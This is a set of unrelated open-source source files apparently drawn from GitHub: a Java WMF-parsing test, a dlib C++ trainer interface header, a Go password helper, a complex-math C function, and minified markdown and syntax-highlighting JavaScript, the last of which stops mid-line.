The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==================================================================== */
package org.apache.poi.hwmf;
import static org.apache.poi.POITestCase.assertContains;
import static org.junit.Assert.assertEquals;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.Charset;
import java.nio.charset.StandardCharsets;
import java.util.List;
import org.apache.poi.POIDataSamples;
import org.apache.poi.hwmf.record.HwmfFont;
import org.apache.poi.hwmf.record.HwmfRecord;
import org.apache.poi.hwmf.record.HwmfRecordType;
import org.apache.poi.hwmf.record.HwmfText;
import org.apache.poi.hwmf.usermodel.HwmfPicture;
import org.apache.poi.util.LocaleUtil;
import org.apache.poi.util.RecordFormatException;
import org.junit.Ignore;
import org.junit.Test;
public class TestHwmfParsing {
private static final POIDataSamples samples = POIDataSamples.getSlideShowInstance();
// ******************************************************************************
// for manual mass parsing and rendering tests of .wmfs use HemfPictureTest.paint() !
// ******************************************************************************
@Test
public void parse() throws IOException {
try (InputStream fis = samples.openResourceAsStream("santa.wmf")) {
HwmfPicture wmf = new HwmfPicture(fis);
List<HwmfRecord> records = wmf.getRecords();
assertEquals(581, records.size());
}
}
@Test(expected = RecordFormatException.class)
public void testInfiniteLoop() throws Exception {
try (InputStream is = samples.openResourceAsStream("61338.wmf")) {
new HwmfPicture(is);
}
}
@Test
@Ignore("If we decide we can use common crawl file specified, we can turn this back on")
public void testCyrillic() throws Exception {
//TODO: move test file to framework and fix this
File dir = new File("C:/somethingOrOther");
File f = new File(dir, "ZMLH54SPLI76NQ7XMKVB7SMUJA2HTXTS-2.wmf");
HwmfPicture wmf = new HwmfPicture(new FileInputStream(f));
Charset charset = LocaleUtil.CHARSET_1252;
StringBuilder sb = new StringBuilder();
//this is pure hackery for specifying the font
//this happens to work on this test file, but you need to
//do what Graphics does by maintaining the stack, etc.!
for (HwmfRecord r : wmf.getRecords()) {
if (r.getWmfRecordType().equals(HwmfRecordType.createFontIndirect)) {
HwmfFont font = ((HwmfText.WmfCreateFontIndirect)r).getFont();
charset = (font.getCharset().getCharset() == null) ? LocaleUtil.CHARSET_1252 : font.getCharset().getCharset();
}
if (r.getWmfRecordType().equals(HwmfRecordType.extTextOut)) {
HwmfText.WmfExtTextOut textOut = (HwmfText.WmfExtTextOut)r;
sb.append(textOut.getText(charset)).append("\n");
}
}
String txt = sb.toString();
assertContains(txt, "\u041E\u0431\u0449\u043E");
assertContains(txt, "\u0411\u0430\u043B\u0430\u043D\u0441");
}
@Test
public void testShift_JIS() throws Exception {
//this file derives from common crawl: see Bug 60677
HwmfPicture wmf = null;
try (InputStream fis = samples.openResourceAsStream("60677.wmf")) {
wmf = new HwmfPicture(fis);
}
Charset charset = LocaleUtil.CHARSET_1252;
StringBuilder sb = new StringBuilder();
//this is pure hackery for specifying the font
//this happens to work on this test file, but you need to
//do what Graphics does by maintaining the stack, etc.!
for (HwmfRecord r : wmf.getRecords()) {
if (r.getWmfRecordType().equals(HwmfRecordType.createFontIndirect)) {
HwmfFont font = ((HwmfText.WmfCreateFontIndirect)r).getFont();
charset = (font.getCharset().getCharset() == null) ? LocaleUtil.CHARSET_1252 : font.getCharset().getCharset();
}
if (r.getWmfRecordType().equals(HwmfRecordType.extTextOut)) {
HwmfText.WmfExtTextOut textOut = (HwmfText.WmfExtTextOut)r;
sb.append(textOut.getText(charset)).append("\n");
}
}
String txt = sb.toString();
assertContains(txt, "\u822A\u7A7A\u60C5\u5831\u696D\u52D9\u3078\u306E\uFF27\uFF29\uFF33");
}
@Test
public void testLengths() throws Exception {
//both substring and length rely on char, not codepoints.
//This test confirms that the substring calls in HwmfText
//will not truncate even beyond-bmp data.
//The last character (Deseret AY U+1040C) is comprised of 2 utf16 surrogates/codepoints
String s = "\u666E\u6797\u65AF\uD801\uDC0C";
Charset utf16LE = StandardCharsets.UTF_16LE;
byte[] bytes = s.getBytes(utf16LE);
String rebuilt = new String(bytes, utf16LE);
rebuilt = rebuilt.substring(0, Math.min(bytes.length, rebuilt.length()));
assertEquals(s, rebuilt);
assertEquals(5, rebuilt.length());
long cnt = rebuilt.codePoints().count();
assertEquals(4, cnt);
}
}
| {
"pile_set_name": "Github"
} |
// Copyright (C) 2013 Davis E. King ([email protected])
// License: Boost Software License See LICENSE.txt for the full license.
#undef DLIB_STRUCTURAL_SEQUENCE_sEGMENTATION_TRAINER_ABSTRACT_Hh_
#ifdef DLIB_STRUCTURAL_SEQUENCE_sEGMENTATION_TRAINER_ABSTRACT_Hh_
#include "sequence_segmenter_abstract.h"
namespace dlib
{
// ----------------------------------------------------------------------------------------
template <
typename feature_extractor
>
class structural_sequence_segmentation_trainer
{
/*!
REQUIREMENTS ON feature_extractor
It must be an object that implements an interface compatible with
the example_feature_extractor defined in dlib/svm/sequence_segmenter_abstract.h.
WHAT THIS OBJECT REPRESENTS
This object is a tool for learning to do sequence segmentation based on a
set of training data. The training procedure produces a sequence_segmenter
object which can be used to identify the sub-segments of new data
sequences.
This object internally uses the structural_sequence_labeling_trainer to
solve the learning problem.
!*/
public:
typedef typename feature_extractor::sequence_type sample_sequence_type;
typedef std::vector<std::pair<unsigned long, unsigned long> > segmented_sequence_type;
typedef sequence_segmenter<feature_extractor> trained_function_type;
structural_sequence_segmentation_trainer (
);
/*!
ensures
- #get_c() == 100
- this object isn't verbose
- #get_epsilon() == 0.1
- #get_num_threads() == 2
- #get_max_cache_size() == 40
- #get_feature_extractor() == a default initialized feature_extractor
- #get_loss_per_missed_segment() == 1
- #get_loss_per_false_alarm() == 1
!*/
explicit structural_sequence_segmentation_trainer (
const feature_extractor& fe
);
/*!
ensures
- #get_c() == 100
- this object isn't verbose
- #get_epsilon() == 0.1
- #get_num_threads() == 2
- #get_max_cache_size() == 40
- #get_feature_extractor() == fe
- #get_loss_per_missed_segment() == 1
- #get_loss_per_false_alarm() == 1
!*/
const feature_extractor& get_feature_extractor (
) const;
/*!
ensures
- returns the feature extractor used by this object
!*/
void set_num_threads (
unsigned long num
);
/*!
ensures
- #get_num_threads() == num
!*/
unsigned long get_num_threads (
) const;
/*!
ensures
- returns the number of threads used during training. You should
usually set this equal to the number of processing cores on your
machine.
!*/
void set_epsilon (
double eps_
);
/*!
requires
- eps > 0
ensures
- #get_epsilon() == eps
!*/
double get_epsilon (
) const;
/*!
ensures
- returns the error epsilon that determines when training should stop.
Smaller values may result in a more accurate solution but take longer
to train. You can think of this epsilon value as saying "solve the
optimization problem until the average number of segmentation mistakes
per training sample is within epsilon of its optimal value".
!*/
void set_max_cache_size (
unsigned long max_size
);
/*!
ensures
- #get_max_cache_size() == max_size
!*/
unsigned long get_max_cache_size (
) const;
/*!
ensures
- During training, this object basically runs the sequence_segmenter on
each training sample, over and over. To speed this up, it is possible to
cache the results of these segmenter invocations. This function returns
the number of cache elements per training sample kept in the cache. Note
that a value of 0 means caching is not used at all.
!*/
void be_verbose (
);
/*!
ensures
- This object will print status messages to standard out so that a user can
observe the progress of the algorithm.
!*/
void be_quiet (
);
/*!
ensures
- this object will not print anything to standard out
!*/
void set_oca (
const oca& item
);
/*!
ensures
- #get_oca() == item
!*/
const oca get_oca (
) const;
/*!
ensures
- returns a copy of the optimizer used to solve the structural SVM problem.
!*/
void set_c (
double C
);
/*!
requires
- C > 0
ensures
- #get_c() = C
!*/
double get_c (
) const;
/*!
ensures
- returns the SVM regularization parameter. It is the parameter that
determines the trade-off between trying to fit the training data (i.e.
minimize the loss) or allowing more errors but hopefully improving the
generalization of the resulting sequence labeler. Larger values
encourage exact fitting while smaller values of C may encourage better
generalization.
!*/
void set_loss_per_missed_segment (
double loss
);
/*!
requires
- loss >= 0
ensures
- #get_loss_per_missed_segment() == loss
!*/
double get_loss_per_missed_segment (
) const;
/*!
ensures
- returns the amount of loss incurred for failing to detect a segment. The
larger the loss the more important it is to detect all the segments.
!*/
void set_loss_per_false_alarm (
double loss
);
/*!
requires
- loss >= 0
ensures
- #get_loss_per_false_alarm() == loss
!*/
double get_loss_per_false_alarm (
) const;
/*!
ensures
- returns the amount of loss incurred for outputting a false detection. The
larger the loss the more important it is to avoid outputting false
detections.
!*/
const sequence_segmenter<feature_extractor> train(
const std::vector<sample_sequence_type>& x,
const std::vector<segmented_sequence_type>& y
) const;
/*!
requires
- is_sequence_segmentation_problem(x, y) == true
ensures
- Uses the given training data to learn to do sequence segmentation. That
is, this function will try to find a sequence_segmenter capable of
predicting y[i] when given x[i] as input. Moreover, it should also be
capable of predicting the segmentation of new input sequences. Or in
other words, the learned sequence_segmenter should also generalize to new
data outside the training dataset.
!*/
};
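/*!
    Minimal usage sketch (not part of the original interface).  The type
    my_feature_extractor is a hypothetical placeholder for any type that
    implements the feature extractor interface expected by sequence_segmenter:

        typedef structural_sequence_segmentation_trainer<my_feature_extractor> trainer_type;
        my_feature_extractor fe;
        trainer_type trainer(fe);
        trainer.set_num_threads(4);   // use 4 CPU cores
        trainer.set_c(10);            // trade-off between fitting and generalization
        std::vector<trainer_type::sample_sequence_type>    samples;   // training inputs
        std::vector<trainer_type::segmented_sequence_type> segments;  // desired segmentations
        // ... fill samples and segments with labeled training data ...
        sequence_segmenter<my_feature_extractor> segmenter = trainer.train(samples, segments);
!*/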
// ----------------------------------------------------------------------------------------
}
#endif // DLIB_STRUCTURAL_SEQUENCE_sEGMENTATION_TRAINER_ABSTRACT_Hh_
| {
"pile_set_name": "Github"
} |
package lea
// ComparePwd reports whether the raw password matches the stored one.
// Legacy passwords were hashed with md5, so the length of the stored hash
// decides which comparison to use.
// rawPwd is the raw password entered by the user; dbPwd is the stored hash.
func ComparePwd(rawPwd, dbPwd string) bool {
if len(dbPwd) == 32 {
return Md5(rawPwd) == dbPwd
}
hex := []byte(dbPwd)
return CompareHash(hex, rawPwd)
}
// GenPwd hashes a raw password for storage.
func GenPwd(rawPwd string) string {
digest, err := GenerateHash(rawPwd)
if err != nil {
return ""
}
return string(digest)
}
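// Usage sketch (Md5, CompareHash and GenerateHash are helpers assumed to be
// defined elsewhere in this package, as referenced above):
//
//	hashed := GenPwd("secret")
//	ok := ComparePwd("secret", hashed) // true; legacy 32-character md5 hashes are also accepted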
| {
"pile_set_name": "Github"
} |
#include "complex_impl.h"
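/* casinhf is derived from casinf via the identity casinh(z) = -i*casin(i*z):
   the argument is first rotated by +90 degrees (multiplied by i), casinf is
   applied, and the result is rotated back by -90 degrees (multiplied by -i). */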
float complex casinhf(float complex z)
{
z = casinf(CMPLXF(-cimagf(z), crealf(z)));
return CMPLXF(cimagf(z), -crealf(z));
}
| {
"pile_set_name": "Github"
} |
/**
* StrapDown.js - an on-the-fly markdown parser
* Copyright (C) 2014, Lilian Besson. (GPLv3 Licensed)
* https://lbesson.bitbucket.org/md/
* Version: 0.4.1
*/
/**
* marked - a markdown parser
* Copyright (c) 2011-2013, Christopher Jeffrey. (MIT Licensed)
* https://github.com/chjj/marked
*/
;(function(){var block={newline:/^\n+/,code:/^( {4}[^\n]+\n*)+/,fences:noop,hr:/^( *[-*_]){3,} *(?:\n+|$)/,heading:/^ *(#{1,6}) *([^\n]+?) *#* *(?:\n+|$)/,nptable:noop,lheading:/^([^\n]+)\n *(=|-){3,} *\n*/,blockquote:/^( *>[^\n]+(\n[^\n]+)*\n*)+/,list:/^( *)(bull) [\s\S]+?(?:hr|\n{2,}(?! )(?!\1bull )\n*|\s*$)/,html:/^ *(?:comment|closed|closing) *(?:\n{2,}|\s*$)/,def:/^ *\[([^\]]+)\]: *<?([^\s>]+)>?(?: +["(]([^\n]+)[")])? *(?:\n+|$)/,table:noop,paragraph:/^((?:[^\n]+\n?(?!hr|heading|lheading|blockquote|tag|def))+)\n*/,text:/^[^\n]+/};block.bullet=/(?:[*+-]|\d+\.)/;block.item=/^( *)(bull) [^\n]*(?:\n(?!\1bull )[^\n]*)*/;block.item=replace(block.item,'gm')
(/bull/g,block.bullet)
();block.list=replace(block.list)
(/bull/g,block.bullet)
('hr',/\n+(?=(?: *[-*_]){3,} *(?:\n+|$))/)
();block._tag='(?!(?:'
+'a|em|strong|small|s|cite|q|dfn|abbr|data|time|code'
+'|var|samp|kbd|sub|sup|i|b|u|mark|ruby|rt|rp|bdi|bdo'
+'|span|br|wbr|ins|del|img)\\b)\\w+(?!:/|@)\\b';block.html=replace(block.html)
('comment',/<!--[\s\S]*?-->/)
('closed',/<(tag)[\s\S]+?<\/\1>/)
('closing',/<tag(?:"[^"]*"|'[^']*'|[^'">])*?>/)
(/tag/g,block._tag)
();block.paragraph=replace(block.paragraph)
('hr',block.hr)
('heading',block.heading)
('lheading',block.lheading)
('blockquote',block.blockquote)
('tag','<'+block._tag)
('def',block.def)
();block.normal=merge({},block);block.gfm=merge({},block.normal,{fences:/^ *(`{3,}|~{3,}) *(\w+)? *\n([\s\S]+?)\s*\1 *(?:\n+|$)/,paragraph:/^/});block.gfm.paragraph=replace(block.paragraph)
('(?!','(?!'+block.gfm.fences.source.replace('\\1','\\2')+'|')
();block.tables=merge({},block.gfm,{nptable:/^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*/,table:/^ *\|(.+)\n *\|( *[-:]+[-| :]*)\n((?: *\|.*(?:\n|$))*)\n*/});function Lexer(options){this.tokens=[];this.tokens.links={};this.options=options||marked.defaults;this.rules=block.normal;if(this.options.gfm){if(this.options.tables){this.rules=block.tables;}else{this.rules=block.gfm;}}}
Lexer.rules=block;Lexer.lex=function(src,options){var lexer=new Lexer(options);return lexer.lex(src);};Lexer.prototype.lex=function(src){src=src.replace(/\r\n|\r/g,'\n').replace(/\t/g,' ').replace(/\u00a0/g,' ').replace(/\u2424/g,'\n');return this.token(src,true);};Lexer.prototype.token=function(src,top){var src=src.replace(/^ +$/gm,''),next,loose,cap,bull,b,item,space,i,l;while(src){if(cap=this.rules.newline.exec(src)){src=src.substring(cap[0].length);if(cap[0].length>1){this.tokens.push({type:'space'});}}
if(cap=this.rules.code.exec(src)){src=src.substring(cap[0].length);cap=cap[0].replace(/^ {4}/gm,'');this.tokens.push({type:'code',text:!this.options.pedantic?cap.replace(/\n+$/,''):cap});continue;}
if(cap=this.rules.fences.exec(src)){src=src.substring(cap[0].length);this.tokens.push({type:'code',lang:cap[2],text:cap[3]});continue;}
if(cap=this.rules.heading.exec(src)){src=src.substring(cap[0].length);this.tokens.push({type:'heading',depth:cap[1].length,text:cap[2]});continue;}
if(top&&(cap=this.rules.nptable.exec(src))){src=src.substring(cap[0].length);item={type:'table',header:cap[1].replace(/^ *| *\| *$/g,'').split(/ *\| */),align:cap[2].replace(/^ *|\| *$/g,'').split(/ *\| */),cells:cap[3].replace(/\n$/,'').split('\n')};for(i=0;i<item.align.length;i++){if(/^ *-+: *$/.test(item.align[i])){item.align[i]='right';}else if(/^ *:-+: *$/.test(item.align[i])){item.align[i]='center';}else if(/^ *:-+ *$/.test(item.align[i])){item.align[i]='left';}else{item.align[i]=null;}}
for(i=0;i<item.cells.length;i++){item.cells[i]=item.cells[i].split(/ *\| */);}
this.tokens.push(item);continue;}
if(cap=this.rules.lheading.exec(src)){src=src.substring(cap[0].length);this.tokens.push({type:'heading',depth:cap[2]==='='?1:2,text:cap[1]});continue;}
if(cap=this.rules.hr.exec(src)){src=src.substring(cap[0].length);this.tokens.push({type:'hr'});continue;}
if(cap=this.rules.blockquote.exec(src)){src=src.substring(cap[0].length);this.tokens.push({type:'blockquote_start'});cap=cap[0].replace(/^ *> ?/gm,'');this.token(cap,top);this.tokens.push({type:'blockquote_end'});continue;}
if(cap=this.rules.list.exec(src)){src=src.substring(cap[0].length);this.tokens.push({type:'list_start',ordered:isFinite(cap[2])});cap=cap[0].match(this.rules.item);if(this.options.smartLists){bull=block.bullet.exec(cap[0])[0];}
next=false;l=cap.length;i=0;for(;i<l;i++){item=cap[i];space=item.length;item=item.replace(/^ *([*+-]|\d+\.) +/,'');if(~item.indexOf('\n ')){space-=item.length;item=!this.options.pedantic?item.replace(new RegExp('^ {1,'+space+'}','gm'),''):item.replace(/^ {1,4}/gm,'');}
if(this.options.smartLists&&i!==l-1){b=block.bullet.exec(cap[i+1])[0];if(bull!==b&&!(bull[1]==='.'&&b[1]==='.')){src=cap.slice(i+1).join('\n')+src;i=l-1;}}
loose=next||/\n\n(?!\s*$)/.test(item);if(i!==l-1){next=item[item.length-1]==='\n';if(!loose)loose=next;}
this.tokens.push({type:loose?'loose_item_start':'list_item_start'});this.token(item,false);this.tokens.push({type:'list_item_end'});}
this.tokens.push({type:'list_end'});continue;}
if(cap=this.rules.html.exec(src)){src=src.substring(cap[0].length);this.tokens.push({type:this.options.sanitize?'paragraph':'html',pre:cap[1]==='pre',text:cap[0]});continue;}
if(top&&(cap=this.rules.def.exec(src))){src=src.substring(cap[0].length);this.tokens.links[cap[1].toLowerCase()]={href:cap[2],title:cap[3]};continue;}
if(top&&(cap=this.rules.table.exec(src))){src=src.substring(cap[0].length);item={type:'table',header:cap[1].replace(/^ *| *\| *$/g,'').split(/ *\| */),align:cap[2].replace(/^ *|\| *$/g,'').split(/ *\| */),cells:cap[3].replace(/(?: *\| *)?\n$/,'').split('\n')};for(i=0;i<item.align.length;i++){if(/^ *-+: *$/.test(item.align[i])){item.align[i]='right';}else if(/^ *:-+: *$/.test(item.align[i])){item.align[i]='center';}else if(/^ *:-+ *$/.test(item.align[i])){item.align[i]='left';}else{item.align[i]=null;}}
for(i=0;i<item.cells.length;i++){item.cells[i]=item.cells[i].replace(/^ *\| *| *\| *$/g,'').split(/ *\| */);}
this.tokens.push(item);continue;}
if(top&&(cap=this.rules.paragraph.exec(src))){src=src.substring(cap[0].length);this.tokens.push({type:'paragraph',text:cap[1][cap[1].length-1]==='\n'?cap[1].slice(0,-1):cap[1]});continue;}
if(cap=this.rules.text.exec(src)){src=src.substring(cap[0].length);this.tokens.push({type:'text',text:cap[0]});continue;}
if(src){throw new
Error('Infinite loop on byte: '+src.charCodeAt(0));}}
return this.tokens;};var inline={escape:/^\\([\\`*{}\[\]()#+\-.!_>])/,autolink:/^<([^ >]+(@|:\/)[^ >]+)>/,url:noop,tag:/^<!--[\s\S]*?-->|^<\/?\w+(?:"[^"]*"|'[^']*'|[^'">])*?>/,link:/^!?\[(inside)\]\(href\)/,reflink:/^!?\[(inside)\]\s*\[([^\]]*)\]/,nolink:/^!?\[((?:\[[^\]]*\]|[^\[\]])*)\]/,strong:/^__([\s\S]+?)__(?!_)|^\*\*([\s\S]+?)\*\*(?!\*)/,em:/^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)/,code:/^(`+)\s*([\s\S]*?[^`])\s*\1(?!`)/,br:/^ {2,}\n(?!\s*$)/,del:noop,text:/^[\s\S]+?(?=[\\<!\[_*`]| {2,}\n|$)/};inline._inside=/(?:\[[^\]]*\]|[^\]]|\](?=[^\[]*\]))*/;inline._href=/\s*<?([^\s]*?)>?(?:\s+['"]([\s\S]*?)['"])?\s*/;inline.link=replace(inline.link)
('inside',inline._inside)
('href',inline._href)
();inline.reflink=replace(inline.reflink)
('inside',inline._inside)
();inline.normal=merge({},inline);inline.pedantic=merge({},inline.normal,{strong:/^__(?=\S)([\s\S]*?\S)__(?!_)|^\*\*(?=\S)([\s\S]*?\S)\*\*(?!\*)/,em:/^_(?=\S)([\s\S]*?\S)_(?!_)|^\*(?=\S)([\s\S]*?\S)\*(?!\*)/});inline.gfm=merge({},inline.normal,{escape:replace(inline.escape)('])','~|])')(),url:/^(https?:\/\/[^\s<]+[^<.,:;"')\]\s])/,del:/^~~(?=\S)([\s\S]*?\S)~~/,text:replace(inline.text)
(']|','~]|')
('|','|https?://|')
()});inline.breaks=merge({},inline.gfm,{br:replace(inline.br)('{2,}','*')(),text:replace(inline.gfm.text)('{2,}','*')()});function InlineLexer(links,options){this.options=options||marked.defaults;this.links=links;this.rules=inline.normal;if(!this.links){throw new
Error('Tokens array requires a `links` property.');}
if(this.options.gfm){if(this.options.breaks){this.rules=inline.breaks;}else{this.rules=inline.gfm;}}else if(this.options.pedantic){this.rules=inline.pedantic;}}
InlineLexer.rules=inline;InlineLexer.output=function(src,links,opt){var inline=new InlineLexer(links,opt);return inline.output(src);};InlineLexer.prototype.output=function(src){var out='',link,text,href,cap;while(src){if(cap=this.rules.escape.exec(src)){src=src.substring(cap[0].length);out+=cap[1];continue;}
if(cap=this.rules.autolink.exec(src)){src=src.substring(cap[0].length);if(cap[2]==='@'){text=cap[1][6]===':'?this.mangle(cap[1].substring(7)):this.mangle(cap[1]);href=this.mangle('mailto:')+text;}else{text=escape(cap[1]);href=text;}
out+='<a href="'
+href
+'">'
+text
+'</a>';continue;}
if(cap=this.rules.url.exec(src)){src=src.substring(cap[0].length);text=escape(cap[1]);href=text;out+='<a href="'
+href
+'">'
+text
+'</a>';continue;}
if(cap=this.rules.tag.exec(src)){src=src.substring(cap[0].length);out+=this.options.sanitize?escape(cap[0]):cap[0];continue;}
if(cap=this.rules.link.exec(src)){src=src.substring(cap[0].length);out+=this.outputLink(cap,{href:cap[2],title:cap[3]});continue;}
if((cap=this.rules.reflink.exec(src))||(cap=this.rules.nolink.exec(src))){src=src.substring(cap[0].length);link=(cap[2]||cap[1]).replace(/\s+/g,' ');link=this.links[link.toLowerCase()];if(!link||!link.href){out+=cap[0][0];src=cap[0].substring(1)+src;continue;}
out+=this.outputLink(cap,link);continue;}
if(cap=this.rules.strong.exec(src)){src=src.substring(cap[0].length);out+='<strong>'
+this.output(cap[2]||cap[1])
+'</strong>';continue;}
if(cap=this.rules.em.exec(src)){src=src.substring(cap[0].length);out+='<em>'
+this.output(cap[2]||cap[1])
+'</em>';continue;}
if(cap=this.rules.code.exec(src)){src=src.substring(cap[0].length);out+='<code>'
+escape(cap[2],true)
+'</code>';continue;}
if(cap=this.rules.br.exec(src)){src=src.substring(cap[0].length);out+='<br>';continue;}
if(cap=this.rules.del.exec(src)){src=src.substring(cap[0].length);out+='<del>'
+this.output(cap[1])
+'</del>';continue;}
if(cap=this.rules.text.exec(src)){src=src.substring(cap[0].length);out+=escape(cap[0]);continue;}
if(src){throw new
Error('Infinite loop on byte: '+src.charCodeAt(0));}}
return out;};InlineLexer.prototype.outputLink=function(cap,link){if(cap[0][0]!=='!'){return'<a href="'
+escape(link.href)
+'"'
+(link.title?' title="'
+escape(link.title)
+'"':'')
+'>'
+this.output(cap[1])
+'</a>';}else{return'<img src="'
+escape(link.href)
+'" alt="'
+escape(cap[1])
+'"'
+(link.title?' title="'
+escape(link.title)
+'"':'')
+'>';}};InlineLexer.prototype.mangle=function(text){var out='',l=text.length,i=0,ch;for(;i<l;i++){ch=text.charCodeAt(i);if(Math.random()>0.5){ch='x'+ch.toString(16);}
out+='&#'+ch+';';}
return out;};function Parser(options){this.tokens=[];this.token=null;this.options=options||marked.defaults;}
Parser.parse=function(src,options){var parser=new Parser(options);return parser.parse(src);};Parser.prototype.parse=function(src){this.inline=new InlineLexer(src.links,this.options);this.tokens=src.reverse();var out='';while(this.next()){out+=this.tok();}
return out;};Parser.prototype.next=function(){return this.token=this.tokens.pop();};Parser.prototype.peek=function(){return this.tokens[this.tokens.length-1]||0;};Parser.prototype.parseText=function(){var body=this.token.text;while(this.peek().type==='text'){body+='\n'+this.next().text;}
return this.inline.output(body);};Parser.prototype.tok=function(){switch(this.token.type){case'space':{return'';}
case'hr':{return'<hr>\n';}
case'heading':{return'<h'
+this.token.depth
+'>'
+this.inline.output(this.token.text)
+'</h'
+this.token.depth
+'>\n';}
case'code':{if(this.options.highlight){var code=this.options.highlight(this.token.text,this.token.lang);if(code!=null&&code!==this.token.text){this.token.escaped=true;this.token.text=code;}}
if(!this.token.escaped){this.token.text=escape(this.token.text,true);}
return'<pre><code'
+(this.token.lang?' class="'
+this.options.langPrefix
+this.token.lang
+'"':'')
+'>'
+this.token.text
+'</code></pre>\n';}
case'table':{var body='',heading,i,row,cell,j;body+='<thead>\n<tr>\n';for(i=0;i<this.token.header.length;i++){heading=this.inline.output(this.token.header[i]);body+=this.token.align[i]?'<th align="'+this.token.align[i]+'">'+heading+'</th>\n':'<th>'+heading+'</th>\n';}
body+='</tr>\n</thead>\n';body+='<tbody>\n'
for(i=0;i<this.token.cells.length;i++){row=this.token.cells[i];body+='<tr>\n';for(j=0;j<row.length;j++){cell=this.inline.output(row[j]);body+=this.token.align[j]?'<td align="'+this.token.align[j]+'">'+cell+'</td>\n':'<td>'+cell+'</td>\n';}
body+='</tr>\n';}
body+='</tbody>\n';return'<table>\n'
+body
+'</table>\n';}
case'blockquote_start':{var body='';while(this.next().type!=='blockquote_end'){body+=this.tok();}
return'<blockquote>\n'
+body
+'</blockquote>\n';}
case'list_start':{var type=this.token.ordered?'ol':'ul',body='';while(this.next().type!=='list_end'){body+=this.tok();}
return'<'
+type
+'>\n'
+body
+'</'
+type
+'>\n';}
case'list_item_start':{var body='';while(this.next().type!=='list_item_end'){body+=this.token.type==='text'?this.parseText():this.tok();}
return'<li>'
+body
+'</li>\n';}
case'loose_item_start':{var body='';while(this.next().type!=='list_item_end'){body+=this.tok();}
return'<li>'
+body
+'</li>\n';}
case'html':{return!this.token.pre&&!this.options.pedantic?this.inline.output(this.token.text):this.token.text;}
case'paragraph':{return'<p>'
+this.inline.output(this.token.text)
+'</p>\n';}
case'text':{return'<p>'
+this.parseText()
+'</p>\n';}}};function escape(html,encode){return html.replace(!encode?/&(?!#?\w+;)/g:/&/g,'&amp;').replace(/</g,'&lt;').replace(/>/g,'&gt;').replace(/"/g,'&quot;').replace(/'/g,'&#39;');}
function replace(regex,opt){regex=regex.source;opt=opt||'';return function self(name,val){if(!name)return new RegExp(regex,opt);val=val.source||val;val=val.replace(/(^|[^\[])\^/g,'$1');regex=regex.replace(name,val);return self;};}
function noop(){}
noop.exec=noop;function merge(obj){var i=1,target,key;for(;i<arguments.length;i++){target=arguments[i];for(key in target){if(Object.prototype.hasOwnProperty.call(target,key)){obj[key]=target[key];}}}
return obj;}
function marked(src,opt){try{if(opt)opt=merge({},marked.defaults,opt);return Parser.parse(Lexer.lex(src,opt),opt);}catch(e){e.message+='\nPlease report this to https://github.com/chjj/marked.';if((opt||marked.defaults).silent){return'An error occured:\n'+e.message;}
throw e;}}
marked.options=marked.setOptions=function(opt){merge(marked.defaults,opt);return marked;};marked.defaults={gfm:true,tables:true,breaks:false,pedantic:false,sanitize:false,smartLists:false,silent:false,highlight:null,langPrefix:'lang-'};marked.Parser=Parser;marked.parser=Parser.parse;marked.Lexer=Lexer;marked.lexer=Lexer.lex;marked.InlineLexer=InlineLexer;marked.inlineLexer=InlineLexer.output;marked.parse=marked;if(typeof exports==='object'){module.exports=marked;}else if(typeof define==='function'&&define.amd){define(function(){return marked;});}else{this.marked=marked;}}).call(function(){return this||(typeof window!=='undefined'?window:global);}());
// Copyright (C) 2006 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
window['PR_SHOULD_USE_CONTINUATION']=true;var prettyPrintOne;var prettyPrint;(function(){var win=window;var FLOW_CONTROL_KEYWORDS=["break,continue,do,else,for,if,return,while"];var C_KEYWORDS=[FLOW_CONTROL_KEYWORDS,"auto,case,char,const,default,"+"double,enum,extern,float,goto,int,long,register,short,signed,sizeof,"+"static,struct,switch,typedef,union,unsigned,void,volatile"];var COMMON_KEYWORDS=[C_KEYWORDS,"catch,class,delete,false,import,"+"new,operator,private,protected,public,this,throw,true,try,typeof"];var CPP_KEYWORDS=[COMMON_KEYWORDS,"alignof,align_union,asm,axiom,bool,"+"concept,concept_map,const_cast,constexpr,decltype,"+"dynamic_cast,explicit,export,friend,inline,late_check,"+"mutable,namespace,nullptr,reinterpret_cast,static_assert,static_cast,"+"template,typeid,typename,using,virtual,where"];var JAVA_KEYWORDS=[COMMON_KEYWORDS,"abstract,boolean,byte,extends,final,finally,implements,import,"+"instanceof,null,native,package,strictfp,super,synchronized,throws,"+"transient"];var CSHARP_KEYWORDS=[JAVA_KEYWORDS,"as,base,by,checked,decimal,delegate,descending,dynamic,event,"+"fixed,foreach,from,group,implicit,in,interface,internal,into,is,let,"+"lock,object,out,override,orderby,params,partial,readonly,ref,sbyte,"+"sealed,stackalloc,string,select,uint,ulong,unchecked,unsafe,ushort,"+"var,virtual,where"];var COFFEE_KEYWORDS="all,and,by,catch,class,else,extends,false,finally,"+"for,if,in,is,isnt,loop,new,no,not,null,of,off,on,or,return,super,then,"+"throw,true,try,unless,until,when,while,yes";var JSCRIPT_KEYWORDS=[COMMON_KEYWORDS,"debugger,eval,export,function,get,null,set,undefined,var,with,"+"Infinity,NaN"];var PERL_KEYWORDS="caller,delete,die,do,dump,elsif,eval,exit,foreach,for,"+"goto,if,import,last,local,my,next,no,our,print,package,redo,require,"+"sub,undef,unless,until,use,wantarray,while,BEGIN,END";var PYTHON_KEYWORDS=[FLOW_CONTROL_KEYWORDS,"and,as,assert,class,def,del,"+"elif,except,exec,finally,from,global,import,in,is,lambda,"+"nonlocal,not,or,pass,print,raise,try,with,yield,"+"False,True,None"];var 